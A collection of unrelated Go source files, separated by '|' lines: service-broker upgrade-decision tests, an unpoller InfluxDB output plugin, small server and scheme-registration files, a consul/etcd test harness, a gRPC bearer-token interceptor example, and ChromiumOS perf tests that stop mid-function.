logger = loggerFactory.New()
})
Describe("DecideOperation()", func() {
It("fails when the requested plan is not in the catalog", func() {
details := domain.UpdateDetails{
PlanID: "not-in-catalog",
}
_, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).To(MatchError("plan not-in-catalog does not exist"))
})
It("is an update when the request doesn't include previous values", func() {
details := domain.UpdateDetails{
PlanID: planWithMI,
MaintenanceInfo: defaultMI,
}
operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).NotTo(HaveOccurred())
Expect(operation).To(Equal(decider.Update))
})
Context("request without maintenance_info", func() {
It("does not warn when the catalog's plan doesn't have maintenance info either", func() {
details := domain.UpdateDetails{
PlanID: otherPlanWithoutMI,
PreviousValues: domain.PreviousValues{
PlanID: planWithoutMI,
},
}
_, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).NotTo(HaveOccurred())
Expect(logBuffer.String()).To(BeEmpty())
})
When("the request is a change of plan", func() {
It("is an update", func() {
details := domain.UpdateDetails{
PlanID: otherPlanWithoutMI,
PreviousValues: domain.PreviousValues{
PlanID: planWithoutMI,
},
}
operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).NotTo(HaveOccurred())
Expect(operation).To(Equal(decider.Update))
})
})
When("there are request parameters", func() {
It("is an update", func() {
details := domain.UpdateDetails{
PlanID: planWithoutMI,
RawParameters: json.RawMessage(`{"foo": "bar"}`),
}
operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).NotTo(HaveOccurred())
Expect(operation).To(Equal(decider.Update))
})
})
When("the plan does not change and there are no request parameters", func() {
It("is an update", func() {
details := domain.UpdateDetails{
PlanID: planWithoutMI,
RawParameters: json.RawMessage(`{ }`),
PreviousValues: domain.PreviousValues{
PlanID: planWithoutMI,
},
}
operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).NotTo(HaveOccurred())
Expect(operation).To(Equal(decider.Update))
})
})
When("the request parameters is invalid JSON", func() {
It("is an update", func() {
details := domain.UpdateDetails{
PlanID: planWithoutMI,
RawParameters: json.RawMessage(`{ --- }`),
PreviousValues: domain.PreviousValues{
PlanID: planWithoutMI,
},
}
operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).NotTo(HaveOccurred())
Expect(operation).To(Equal(decider.Update))
})
})
When("the desired plan has maintenance_info in the catalog", func() {
When("no previous maintenance_info is present in the request", func() {
When("the previous plan has maintenance info", func() {
It("is an update, and it warns", func() {
details := domain.UpdateDetails{
PlanID: otherPlanWithMI,
PreviousValues: domain.PreviousValues{
PlanID: planWithMI,
},
}
operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).NotTo(HaveOccurred())
Expect(operation).To(Equal(decider.Update))
Expect(logBuffer.String()).To(ContainSubstring(
"warning: maintenance info defined in broker service catalog, but not passed in request",
))
})
})
When("the previous plan doesn't have maintenance info", func() {
It("is an update, and it warns", func() {
details := domain.UpdateDetails{
PlanID: planWithMI,
PreviousValues: domain.PreviousValues{
PlanID: planWithoutMI,
},
}
operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).NotTo(HaveOccurred())
Expect(operation).To(Equal(decider.Update))
Expect(logBuffer.String()).To(ContainSubstring(
"warning: maintenance info defined in broker service catalog, but not passed in request",
))
})
})
})
When("previous maintenance_info is present in the request", func() {
It("fails when it does not match the catalog's maintenance info for the previous plan", func() {
details := domain.UpdateDetails{
PlanID: otherPlanWithMI,
PreviousValues: domain.PreviousValues{
PlanID: planWithMI,
MaintenanceInfo: higherMI,
},
}
_, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).To(MatchError(apiresponses.NewFailureResponseBuilder(
errors.New("service instance needs to be upgraded before updating"),
http.StatusUnprocessableEntity,
"previous-maintenance-info-check",
).Build()))
Expect(logBuffer.String()).To(ContainSubstring(
"warning: maintenance info defined in broker service catalog, but not passed in request",
))
})
It("is an update when it matches the catalog's maintenance info for the previous plan", func() {
details := domain.UpdateDetails{
PlanID: otherPlanWithMI,
PreviousValues: domain.PreviousValues{
PlanID: planWithMI,
MaintenanceInfo: defaultMI,
},
}
op, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).ToNot(HaveOccurred())
Expect(op).To(Equal(decider.Update))
Expect(logBuffer.String()).To(ContainSubstring(
"warning: maintenance info defined in broker service catalog, but not passed in request",
))
})
})
})
})
Context("request and plan have the same maintenance_info", func() {
When("the request is a change of plan", func() {
It("is an update", func() {
details := domain.UpdateDetails{
PlanID: otherPlanWithMI,
MaintenanceInfo: higherMI,
PreviousValues: domain.PreviousValues{
PlanID: planWithMI,
MaintenanceInfo: defaultMI,
},
}
operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).NotTo(HaveOccurred())
Expect(operation).To(Equal(decider.Update))
})
})
When("there are request parameters", func() {
It("is an update", func() {
details := domain.UpdateDetails{
PlanID: planWithMI,
MaintenanceInfo: defaultMI,
RawParameters: json.RawMessage(`{"foo": "bar"}`),
}
operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).NotTo(HaveOccurred())
Expect(operation).To(Equal(decider.Update))
})
})
When("the plan does not change and there are no request parameters", func() {
It("is an update", func() {
details := domain.UpdateDetails{
PlanID: planWithMI,
MaintenanceInfo: defaultMI,
RawParameters: json.RawMessage(`{ }`),
PreviousValues: domain.PreviousValues{
PlanID: planWithMI,
MaintenanceInfo: defaultMI,
},
}
operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).NotTo(HaveOccurred())
Expect(operation).To(Equal(decider.Update))
})
})
When("the request parameters is invalid JSON", func() {
It("is an update", func() {
details := domain.UpdateDetails{
PlanID: planWithMI,
MaintenanceInfo: defaultMI,
RawParameters: json.RawMessage(`{ --- }`),
PreviousValues: domain.PreviousValues{
PlanID: planWithMI,
MaintenanceInfo: defaultMI,
},
}
operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).NotTo(HaveOccurred())
Expect(operation).To(Equal(decider.Update))
})
})
})
Context("request has different maintenance_info values", func() {
When("adding maintenance_info when there was none before", func() {
It("is an upgrade", func() {
details := domain.UpdateDetails{
PlanID: planWithMI,
MaintenanceInfo: defaultMI,
PreviousValues: domain.PreviousValues{
PlanID: planWithMI,
},
}
operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).NotTo(HaveOccurred())
Expect(operation).To(Equal(decider.Upgrade))
})
})
When("removing maintenance_info when it was there before", func() {
It("is an upgrade", func() {
details := domain.UpdateDetails{
PlanID: planWithoutMI,
PreviousValues: domain.PreviousValues{
PlanID: planWithoutMI,
MaintenanceInfo: defaultMI,
},
}
operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).NotTo(HaveOccurred())
Expect(operation).To(Equal(decider.Upgrade))
})
})
When("the plan has not changed and there are no request parameters", func() {
It("is an upgrade", func() {
details := domain.UpdateDetails{
PlanID: planWithMI,
MaintenanceInfo: defaultMI,
PreviousValues: domain.PreviousValues{
PlanID: planWithMI,
MaintenanceInfo: higherMI,
},
}
operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).NotTo(HaveOccurred())
Expect(operation).To(Equal(decider.Upgrade))
})
})
When("there is a change of plan", func() {
It("fails when the previous maintenance_info does not match the previous plan maintenance_info", func() {
details := domain.UpdateDetails{
PlanID: planWithMI,
MaintenanceInfo: defaultMI,
PreviousValues: domain.PreviousValues{
PlanID: otherPlanWithMI,
MaintenanceInfo: defaultMI,
},
}
_, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).To(MatchError(apiresponses.NewFailureResponseBuilder(
errors.New("service instance needs to be upgraded before updating"),
http.StatusUnprocessableEntity,
"previous-maintenance-info-check",
).Build()))
})
It("is an update when the previous maintenance_info matches the previous plan", func() {
details := domain.UpdateDetails{
PlanID: otherPlanWithMI,
MaintenanceInfo: higherMI,
PreviousValues: domain.PreviousValues{
PlanID: planWithMI,
MaintenanceInfo: defaultMI,
},
}
operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).NotTo(HaveOccurred())
Expect(operation).To(Equal(decider.Update))
})
It("is an update when the previous plan is not in the catalog", func() {
details := domain.UpdateDetails{
PlanID: planWithMI,
MaintenanceInfo: defaultMI,
PreviousValues: domain.PreviousValues{
PlanID: "fake-plan-that-does-not-exist",
MaintenanceInfo: &domain.MaintenanceInfo{
Version: "1.2.1",
},
},
}
operation, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).NotTo(HaveOccurred())
Expect(operation).To(Equal(decider.Update))
})
})
When("there are request parameters", func() {
It("fails", func() {
details := domain.UpdateDetails{
PlanID: planWithMI,
RawParameters: json.RawMessage(`{"foo": "bar"}`),
MaintenanceInfo: defaultMI,
PreviousValues: domain.PreviousValues{
PlanID: planWithMI,
MaintenanceInfo: higherMI,
},
}
_, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).To(MatchError(apiresponses.NewFailureResponseBuilder(
errors.New("service instance needs to be upgraded before updating"),
http.StatusUnprocessableEntity,
"previous-maintenance-info-check",
).Build()))
})
})
})
Context("request and plan have different maintenance_info values", func() {
It("fails when the maintenance_info requested does not match the plan", func() {
details := domain.UpdateDetails{
PlanID: planWithMI,
MaintenanceInfo: higherMI,
}
_, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).To(MatchError(apiresponses.ErrMaintenanceInfoConflict))
})
It("fails when the request has maintenance_info but the plan does not", func() {
details := domain.UpdateDetails{
PlanID: planWithoutMI,
MaintenanceInfo: defaultMI,
}
_, err := decider.Decider{}.DecideOperation(catalog, details, logger)
Expect(err).To(MatchError(apiresponses.ErrMaintenanceInfoNilConflict))
})
})
})
Describe("CanProvision()", func() {
It("fails when the requested plan is not in the catalog", func() {
err := decider.Decider{}.CanProvision(catalog, "not-in-catalog", nil, logger)
Expect(err).To(MatchError("plan not-in-catalog does not exist"))
})
It("succeeds when the request maintenance_info matches the plan maintenance_info", func() {
err := decider.Decider{}.CanProvision(catalog, planWithMI, defaultMI, logger)
Expect(err).ToNot(HaveOccurred())
})
Context("request and plan have different maintenance_info values", func() {
It("fails when the maintenance_info requested does not match the plan", func() {
err := decider.Decider{}.CanProvision(catalog, planWithMI, higherMI, logger)
Expect(err).To(MatchError(apiresponses.ErrMaintenanceInfoConflict))
})
It("fails when the request has maintenance_info but the plan does not", func() {
err := decider.Decider{}.CanProvision(catalog, planWithoutMI, defaultMI, logger)
Expect(err).To(MatchError(apiresponses.ErrMaintenanceInfoNilConflict))
})
})
Context("request without maintenance_info", func() {
It("does not warn when the catalog's plan doesn't have maintenance info either", func() {
err := decider.Decider{}.CanProvision(catalog, otherPlanWithoutMI, nil, logger)
Expect(err).NotTo(HaveOccurred())
Expect(logBuffer.String()).To(BeEmpty())
})
When("the plan has maintenance_info", func() {
It("warns", func() {
err := decider.Decider{}.CanProvision(catalog, planWithMI, nil, logger)
Expect(err).NotTo(HaveOccurred())
Expect(logBuffer.String()).To(ContainSubstring(
"warning: maintenance info defined in broker service catalog, but not passed in request",
))
})
})
})
})
})
|
// Package influxunifi provides the methods to turn UniFi measurements into influx
// data-points with appropriate tags and fields.
package influxunifi
import (
"crypto/tls"
"fmt"
"io/ioutil"
"log"
"strconv"
"strings"
"time"
influx "github.com/influxdata/influxdb1-client/v2"
"github.com/unpoller/poller"
"github.com/unpoller/unifi"
"github.com/unpoller/webserver"
"golift.io/cnfg"
)
// PluginName is the name of this plugin.
const PluginName = "influxdb"
const (
defaultInterval = 30 * time.Second
minimumInterval = 10 * time.Second
defaultInfluxDB = "unifi"
defaultInfluxUser = "unifipoller"
defaultInfluxURL = "http://127.0.0.1:8086"
)
// Config defines the data needed to store metrics in InfluxDB.
type Config struct {
Interval cnfg.Duration `json:"interval,omitempty" toml:"interval,omitempty" xml:"interval" yaml:"interval"`
URL string `json:"url,omitempty" toml:"url,omitempty" xml:"url" yaml:"url"`
User string `json:"user,omitempty" toml:"user,omitempty" xml:"user" yaml:"user"`
Pass string `json:"pass,omitempty" toml:"pass,omitempty" xml:"pass" yaml:"pass"`
DB string `json:"db,omitempty" toml:"db,omitempty" xml:"db" yaml:"db"`
Disable bool `json:"disable" toml:"disable" xml:"disable,attr" yaml:"disable"`
VerifySSL bool `json:"verify_ssl" toml:"verify_ssl" xml:"verify_ssl" yaml:"verify_ssl"`
// Save data for dead ports? ie. ports that are down or disabled.
DeadPorts bool `json:"dead_ports" toml:"dead_ports" xml:"dead_ports" yaml:"dead_ports"`
}
// InfluxDB allows the data to be nested in the config file.
type InfluxDB struct {
*Config `json:"influxdb" toml:"influxdb" xml:"influxdb" yaml:"influxdb"`
}
// InfluxUnifi is returned by New() after you provide a Config.
type InfluxUnifi struct {
Collector poller.Collect
influx influx.Client
LastCheck time.Time
*InfluxDB
}
type metric struct {
Table string
Tags map[string]string
Fields map[string]interface{}
TS time.Time
}
func init() { // nolint: gochecknoinits
u := &InfluxUnifi{InfluxDB: &InfluxDB{}, LastCheck: time.Now()}
poller.NewOutput(&poller.Output{
Name: PluginName,
Config: u.InfluxDB,
Method: u.Run,
})
}
// PollController runs forever, polling UniFi and pushing to InfluxDB
// This is started by Run() or RunBoth() after everything checks out.
func (u *InfluxUnifi) PollController() {
interval := u.Interval.Round(time.Second)
ticker := time.NewTicker(interval)
log.Printf("[INFO] Poller->InfluxDB started, interval: %v, dp: %v, db: %s, url: %s",
interval, u.DeadPorts, u.DB, u.URL)
for u.LastCheck = range ticker.C {
metrics, err := u.Collector.Metrics(&poller.Filter{Name: "unifi"})
if err != nil {
u.LogErrorf("metric fetch for InfluxDB failed: %v", err)
continue
}
events, err := u.Collector.Events(&poller.Filter{Name: "unifi", Dur: interval})
if err != nil {
u.LogErrorf("event fetch for InfluxDB failed: %v", err)
continue
}
report, err := u.ReportMetrics(metrics, events)
if err != nil {
// XXX: reset and re-auth? not sure..
u.LogErrorf("%v", err)
continue
}
u.Logf("UniFi Metrics Recorded. %v", report)
}
}
// Run runs a ticker to poll the unifi server and update influxdb.
func (u *InfluxUnifi) Run(c poller.Collect) error {
var err error
if u.Collector = c; u.Config == nil || u.Disable {
u.Logf("InfluxDB config missing (or disabled), InfluxDB output disabled!")
return nil
}
u.setConfigDefaults()
u.influx, err = influx.NewHTTPClient(influx.HTTPConfig{
Addr: u.URL,
Username: u.User,
Password: u.Pass,
TLSConfig: &tls.Config{InsecureSkipVerify: !u.VerifySSL}, // nolint: gosec
})
if err != nil {
return fmt.Errorf("making client: %w", err)
}
fake := *u.Config
fake.Pass = strconv.FormatBool(fake.Pass != "")
webserver.UpdateOutput(&webserver.Output{Name: PluginName, Config: fake})
u.PollController()
return nil
}
func (u *InfluxUnifi) setConfigDefaults() {
if u.URL == "" {
u.URL = defaultInfluxURL
}
if u.User == "" {
u.User = defaultInfluxUser
}
if strings.HasPrefix(u.Pass, "file://") {
u.Pass = u.getPassFromFile(strings.TrimPrefix(u.Pass, "file://"))
}
if u.Pass == "" {
u.Pass = defaultInfluxUser
}
if u.DB == "" {
u.DB = defaultInfluxDB
}
if u.Interval.Duration == 0 {
u.Interval = cnfg.Duration{Duration: defaultInterval}
} else if u.Interval.Duration < minimumInterval {
u.Interval = cnfg.Duration{Duration: minimumInterval}
}
u.Interval = cnfg.Duration{Duration: u.Interval.Duration.Round(time.Second)}
}
func (u *InfluxUnifi) getPassFromFile(filename string) string {
b, err := ioutil.ReadFile(filename)
if err != nil {
u.LogErrorf("Reading InfluxDB Password File: %v", err)
}
return strings.TrimSpace(string(b))
}
// ReportMetrics batches all device and client data into influxdb data points.
// Call this after you've collected all the data you care about.
// Returns an error if influxdb calls fail, otherwise returns a report.
func (u *InfluxUnifi) ReportMetrics(m *poller.Metrics, e *poller.Events) (*Report, error) {
r := &Report{
Metrics: m,
Events: e,
ch: make(chan *metric),
Start: time.Now(),
Counts: &Counts{Val: make(map[item]int)},
}
defer close(r.ch)
var err error
// Make a new Influx Points Batcher.
r.bp, err = influx.NewBatchPoints(influx.BatchPointsConfig{Database: u.DB})
if err != nil {
return nil, fmt.Errorf("influx.NewBatchPoint: %w", err)
}
go u.collect(r, r.ch)
// Batch all the points.
u.loopPoints(r)
r.wg.Wait() // wait for all points to finish batching!
// Send all the points.
if err = u.influx.Write(r.bp); err != nil {
return nil, fmt.Errorf("influxdb.Write(points): %w", err)
}
r.Elapsed = time.Since(r.Start)
return r, nil
}
// collect runs in a go routine and batches all the points.
func (u *InfluxUnifi) collect(r report, ch chan *metric) {
for m := range ch {
if m.TS.IsZero() {
m.TS = r.metrics().TS
}
pt, err := influx.NewPoint(m.Table, m.Tags, m.Fields, m.TS)
if err == nil {
r.batch(m, pt)
}
r.error(err)
r.done()
}
}
// loopPoints kicks off 3 or 7 go routines to process metrics and send them
// to the collect routine through the metric channel.
func (u *InfluxUnifi) loopPoints(r report) {
m := r.metrics()
for _, s := range m.RogueAPs {
u.switchExport(r, s)
}
for _, s := range m.Sites {
u.switchExport(r, s)
}
for _, s := range m.SitesDPI {
u.batchSiteDPI(r, s)
}
for _, s := range m.Clients {
u.switchExport(r, s)
}
for _, s := range m.Devices {
u.switchExport(r, s)
}
for _, s := range r.events().Logs {
u.switchExport(r, s)
}
appTotal := make(totalsDPImap)
catTotal := make(totalsDPImap)
for _, s := range m.ClientsDPI {
u.batchClientDPI(r, s, appTotal, catTotal)
}
reportClientDPItotals(r, appTotal, catTotal)
}
func (u *InfluxUnifi) switchExport(r report, v interface{}) { //nolint:cyclop
switch v := v.(type) {
case *unifi.RogueAP:
u.batchRogueAP(r, v)
case *unifi.UAP:
u.batchUAP(r, v)
case *unifi.USW:
u.batchUSW(r, v)
case *unifi.USG:
u.batchUSG(r, v)
case *unifi.UXG:
u.batchUXG(r, v)
case *unifi.UDM:
u.batchUDM(r, v)
case *unifi.Site:
u.batchSite(r, v)
case *unifi.Client:
u.batchClient(r, v)
case *unifi.Event:
u.batchEvent(r, v)
case *unifi.IDS:
u.batchIDS(r, v)
case *unifi.Alarm:
u.batchAlarms(r, v)
case *unifi.Anomaly:
u.batchAnomaly(r, v)
default:
u.LogErrorf("invalid export type: %T", v)
}
}
|
package main
import (
"pika/driver"
"pika/pkg/logger"
"pika/routers"
"github.com/gin-gonic/gin"
)
func main() {
driver.InitDB()
driver.InitRedis()
logger.InitLogger()
gin.SetMode(gin.ReleaseMode)
g := gin.New()
g = routers.Load(g)
// ginpprof.Wrap(g)
if err := g.Run(":8082"); err != nil {
logger.F.Error("service start fail: " + err.Error())
}
}
|
package v1alpha1
import (
"github.com/openshift-knative/knative-openshift-ingress/pkg/apis"
networkingv1alpha1 "knative.dev/serving/pkg/apis/networking/v1alpha1"
)
func init() {
apis.AddToSchemes = append(apis.AddToSchemes, networkingv1alpha1.SchemeBuilder.AddToScheme)
}
|
// Package common contains common utilities and suites to be used in other tests
package common
import (
"bytes"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"math/rand"
"net/http"
"os"
"os/exec"
"path/filepath"
"strconv"
"testing"
"time"
"github.com/cerana/cerana/pkg/kv"
_ "github.com/cerana/cerana/pkg/kv/consul" // register consul with pkg/kv
"github.com/pborman/uuid"
"github.com/stretchr/testify/suite"
)
func init() {
rand.Seed(time.Now().UnixNano())
}
// ConsulMaker will create an exec.Cmd to run consul with the given paramaters
func ConsulMaker(port uint16, dir, prefix string) *exec.Cmd {
b, err := json.Marshal(map[string]interface{}{
"ports": map[string]interface{}{
"dns": port + 1,
"http": port + 2,
"rpc": port + 3,
"serf_lan": port + 4,
"serf_wan": port + 5,
"server": port + 6,
},
"session_ttl_min": "1s",
})
if err != nil {
panic(err)
}
err = ioutil.WriteFile(dir+"/config.json", b, 0444)
if err != nil {
panic(err)
}
return exec.Command("consul",
"agent",
"-server",
"-bootstrap-expect", "1",
"-config-file", dir+"/config.json",
"-data-dir", dir,
"-bind", "127.0.0.1",
"-http-port", strconv.Itoa(int(port)),
)
}
// EtcdMaker will create an exec.Cmd to run etcd with the given paramaters
func EtcdMaker(port uint16, dir, prefix string) *exec.Cmd {
clientURL := fmt.Sprintf("http://127.0.0.1:%d", port)
peerURL := fmt.Sprintf("http://127.0.0.1:%d", port+1)
return exec.Command("etcd",
"-name", prefix,
"-data-dir", dir,
"-initial-cluster-state", "new",
"-initial-cluster-token", prefix,
"-initial-cluster", prefix+"="+peerURL,
"-initial-advertise-peer-urls", peerURL,
"-listen-peer-urls", peerURL,
"-listen-client-urls", clientURL,
"-advertise-client-urls", clientURL,
)
}
// Suite sets up a general test suite with setup/teardown.
type Suite struct {
suite.Suite
KVDir string
KVPrefix string
KVPort uint16
KVURL string
KV kv.KV
KVCmd *exec.Cmd
KVCmdMaker func(uint16, string, string) *exec.Cmd
TestPrefix string
}
// SetupSuite runs a new kv instance.
func (s *Suite) SetupSuite() {
if s.TestPrefix == "" {
s.TestPrefix = "lochness-test"
}
s.KVDir, _ = ioutil.TempDir("", s.TestPrefix+"-"+uuid.New())
if s.KVPort == 0 {
s.KVPort = uint16(1024 + rand.Intn(65535-1024))
}
if s.KVCmdMaker == nil {
s.KVCmdMaker = ConsulMaker
}
s.KVCmd = s.KVCmdMaker(s.KVPort, s.KVDir, s.TestPrefix)
if testing.Verbose() {
s.KVCmd.Stdout = os.Stdout
s.KVCmd.Stderr = os.Stderr
}
s.Require().NoError(s.KVCmd.Start())
time.Sleep(2500 * time.Millisecond) // Wait for test kv to be ready
var err error
for i := 0; i < 10; i++ {
s.KV, err = kv.New("http://127.0.0.1:" + strconv.Itoa(int(s.KVPort)))
if err == nil {
break
}
err = s.KV.Ping()
if err == nil {
break
}
time.Sleep(500 * time.Millisecond) // Wait for test kv to be ready
}
if s.KV == nil {
panic(err)
}
s.KVPrefix = "lochness"
s.KVURL = "http://127.0.0.1:" + strconv.Itoa(int(s.KVPort))
}
// SetupTest prepares anything needed per test.
func (s *Suite) SetupTest() {
}
// TearDownTest cleans the kv instance.
func (s *Suite) TearDownTest() {
s.Require().NoError(s.KV.Delete(s.KVPrefix, true))
}
// TearDownSuite stops the kv instance and removes all data.
func (s *Suite) TearDownSuite() {
// Stop the test kv process
s.Require().NoError(s.KVCmd.Process.Kill())
s.Require().Error(s.KVCmd.Wait())
// Remove the test kv data directory
_ = os.RemoveAll(s.KVDir)
}
// PrefixKey generates a kv key using the set prefix
func (s *Suite) PrefixKey(key string) string {
return filepath.Join(s.KVPrefix, key)
}
// DoRequest is a convenience method for making an http request and doing basic handling of the response.
func (s *Suite) DoRequest(method, url string, expectedRespCode int, postBodyStruct interface{}, respBody interface{}) *http.Response {
var postBody io.Reader
if postBodyStruct != nil {
bodyBytes, _ := json.Marshal(postBodyStruct)
postBody = bytes.NewBuffer(bodyBytes)
}
req, err := http.NewRequest(method, url, postBody)
if postBody != nil {
req.Header.Add("Content-Type", "application/json")
}
client := &http.Client{}
resp, err := client.Do(req)
s.NoError(err)
correctResponse := s.Equal(expectedRespCode, resp.StatusCode)
defer func() { _ = resp.Body.Close() }()
body, err := ioutil.ReadAll(resp.Body)
s.NoError(err)
if correctResponse {
s.NoError(json.Unmarshal(body, respBody))
} else {
s.T().Log(string(body))
}
return resp
}
|
../src0/base_1526__tcpBufMachine__tunnel_local2remote_send.go |
package main
import (
"context"
"crypto/tls"
"google.golang.org/grpc"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/credentials"
"google.golang.org/grpc/metadata"
"google.golang.org/grpc/status"
pb "grpc-up-and-running/examples/security/oauth2/server/ecommerce"
"log"
"net"
"strings"
)
type server struct {}
var (
port = ":50051"
crtFile = "server.crt" // server public certificate.
keyFile = "server.key" // server private key.
correctToken = "some-secret-token"
errMissingMetadata = status.Errorf(codes.InvalidArgument, "missing metadata")
errInvalidToken = status.Errorf(codes.Unauthenticated, "invalid credentials")
)
func main() {
cert, err := tls.LoadX509KeyPair(crtFile, keyFile)
if err != nil {
log.Fatalf("failed to load key pair: %s", err)
}
opts := []grpc.ServerOption{
// Enable TLS for all incoming connections.
grpc.Creds(credentials.NewServerTLSFromCert(&cert)),
grpc.UnaryInterceptor(ensureValidToken),
}
s := grpc.NewServer(opts...)
pb.RegisterProductInfoServer(s, &server{})
lis, err := net.Listen("tcp", port)
if err != nil {
log.Fatalf("failed to listen: %v", err)
}
if err := s.Serve(lis); err != nil {
log.Fatalf("failed to serve: %v", err)
}
}
// This method ensures a valid token exists within a request's metadata.
// - If the token is missing or invalid, the interceptor blocks execution of the handler and returns an error.
// - Otherwise, the interceptor invokes the unary handler.
func ensureValidToken(ctx context.Context, req interface{}, info *grpc.UnaryServerInfo,
handler grpc.UnaryHandler) (interface{}, error) {
md, ok := metadata.FromIncomingContext(ctx)
if !ok {
return nil, errMissingMetadata
}
if !valid(md["authorization"]) {
return nil, errInvalidToken
}
return handler(ctx, req)
}
// Validates the token.
func valid(authorization []string) bool {
if len(authorization) < 1 {
return false
}
token := strings.TrimPrefix(authorization[0], "Bearer ")
return token == correctToken
}
func (s server) AddProduct(context.Context, *pb.Product) (*pb.ProductID, error) {
panic("implement me")
}
func (s server) GetProduct(context.Context, *pb.ProductID) (*pb.Product, error) {
panic("implement me")
} |
// Copyright 2018 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package perf
import (
"context"
"encoding/json"
"io/ioutil"
"os"
"path/filepath"
"reflect"
"testing"
"chromiumos/tast/errors"
"chromiumos/tast/testutil"
)
func loadJSON(path string) (interface{}, error) {
f, err := os.Open(path)
if err != nil {
return nil, errors.Wrapf(err, "failed opening %s", path)
}
defer f.Close()
var v interface{}
if err := json.NewDecoder(f).Decode(&v); err != nil {
return nil, errors.Wrapf(err, "failed decoding %s", path)
}
return v, nil
}
func jsonEquals(path1, path2 string) error {
v1, err := loadJSON(path1)
if err != nil {
return err
}
v2, err := loadJSON(path2)
if err != nil {
return err
}
if !reflect.DeepEqual(v1, v2) {
return errors.New("JSON files differ")
}
return nil
}
func saveAndCompare(t *testing.T, p *Values, goldenPath string) {
t.Helper()
td := testutil.TempDir(t)
defer os.RemoveAll(td)
if err := p.Save(td); err != nil {
t.Fatal("Failed saving JSON: ", err)
}
path := filepath.Join(td, "results-chart.json")
if err := jsonEquals(path, goldenPath); err != nil {
data, _ := ioutil.ReadFile(path)
t.Fatalf("%v; output:\n%s", err, string(data))
}
}
func TestSetSingle(t *testing.T) {
metric := Metric{Name: "metric", Unit: "unit", Direction: SmallerIsBetter}
p := NewValues()
p.Set(metric, 1)
p.Set(metric, 2)
p.Set(metric, 3)
saveAndCompare(t, p, "testdata/TestSetSingle.json")
}
func TestSetSinglePanic(t *testing.T) {
metric := Metric{Name: "metric", Unit: "unit", Direction: SmallerIsBetter}
p := NewValues()
defer func() {
if r := recover(); r == nil {
t.Error("Did not panic")
}
}()
// Set with multiple values panics for single-valued metrics.
p.Set(metric, 1, 2, 3)
}
func TestSetMultiple(t *testing.T) {
metric := Metric{Name: "metric", Unit: "unit", Direction: SmallerIsBetter, Multiple: true}
p := NewValues()
p.Set(metric, 1, 2, 3)
p.Set(metric, 4, 5, 6)
saveAndCompare(t, p, "testdata/TestSetMultiple.json")
}
func TestMergeValues(t *testing.T) {
metric1 := Metric{Name: "metric1", Unit: "unit", Direction: SmallerIsBetter, Multiple: true}
metric2 := Metric{Name: "metric2", Unit: "unit", Direction: BiggerIsBetter, Multiple: true}
metric3 := Metric{Name: "metric3", Unit: "unit", Direction: BiggerIsBetter, Multiple: false}
p1 := NewValues()
p2 := NewValues()
p3 := NewValues()
p1.Set(metric1, 3, 2, 3)
p2.Set(metric1, 1, 9, 6)
p2.Set(metric2, 2, 0)
p3.Set(metric1, 1, 9, 9, 0)
p3.Set(metric2, 0, 7, 2, 8)
p3.Set(metric3, 1000)
p1.Merge(p2, p3)
saveAndCompare(t, p1, "testdata/TestMergeValues.json")
}
func TestAppendSinglePanic(t *testing.T) {
metric := Metric{Name: "metric", Unit: "unit", Direction: SmallerIsBetter}
p := NewValues()
defer func() {
if r := recover(); r == nil {
t.Error("Did not panic")
}
}()
// Append panics for single-valued metrics.
p.Append(metric, 1)
}
func TestAppendMultiple(t *testing.T) {
metric := Metric{Name: "metric", Unit: "unit", Direction: SmallerIsBetter, Multiple: true}
p := NewValues()
p.Append(metric, 1)
p.Append(metric, 2, 3)
saveAndCompare(t, p, "testdata/TestAppendMultiple.json")
}
func TestSave(t *testing.T) {
var (
metric1 = Metric{Name: "metric1", Unit: "unit1", Direction: SmallerIsBetter}
metric2 = Metric{Name: "metric2", Unit: "unit2", Direction: SmallerIsBetter, Multiple: true}
metric3a = Metric{Name: "metric3", Variant: "a", Unit: "unit3a", Direction: SmallerIsBetter}
metric3b = Metric{Name: "metric3", Variant: "b", Unit: "unit3b", Direction: BiggerIsBetter}
)
p := NewValues()
p.Set(metric1, 100)
p.Set(metric2, 200, 201, 202)
p.Set(metric3a, 300)
p.Set(metric3b, 310)
saveAndCompare(t, p, "testdata/TestSave.json")
}
func TestSave_Zero(t *testing.T) {
var (
metric1 = Metric{Name: "metric1", Unit: "unit1", Direction: SmallerIsBetter}
metric2 = Metric{Name: "metric2", Unit: "unit2", Direction: SmallerIsBetter, Multiple: true}
)
p := NewValues()
p.Set(metric1, 0)
p.Set(metric2)
saveAndCompare(t, p, "testdata/TestSave_Zero.json")
}
func saveAsAndCompare(t *testing.T, p *Values, goldenPath string, format Format, expectedFileName string) {
t.Helper()
td := testutil.TempDir(t)
defer os.RemoveAll(td)
runGenGUID = func(context.Context) (string, error) { return "FAKE-GUID", nil }
if err := p.SaveAs(context.Background(), td, format); err != nil {
t.Fatal("Failed saving JSON: ", err)
}
path := filepath.Join(td, expectedFileName)
if err := jsonEquals(path, goldenPath); err != nil {
